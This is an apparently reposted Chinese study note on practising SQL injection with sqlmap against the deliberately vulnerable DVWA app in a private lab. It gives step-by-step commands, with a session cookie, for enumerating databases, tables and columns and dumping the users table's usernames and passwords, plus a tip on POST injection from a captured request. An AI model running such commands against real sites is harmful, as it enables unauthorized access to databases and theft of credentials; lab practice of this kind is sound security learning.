sqlmap+DVWA渗透笔记(low)

    学习使用sqlmap,自己搭建了虚拟机环境,利用DVWA网站进行了最简单的注入,如下是自己的学习笔记。

1.尝试注入

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" 

发现跳转到login页面,说明需要Cookie维持会话

2.加入cookie尝试

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"

3.爆出数据库类型

 

4.爆数据库名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" --dbs 

结果:

5.爆表名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa --tables

结果:

6.爆列名

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa -T users --columns

结果:

7.爆字段

sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"   -D dvwa -T users -C user,password --dump

结果:

补充:

  如果是POST注入的话,我们只需要用抓包工具(如burpsuite)抓包,然后将包内容复制到一个.txt文本中,使用如下命令进行注入:

sqlmap.py -r "path\post.txt" -p n  

-r :后接txt文件的路径

-p:指定存在注入的参数n

其他就和get注入一样。

转载于:https://www.cnblogs.com/panpanblog/p/8950101.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值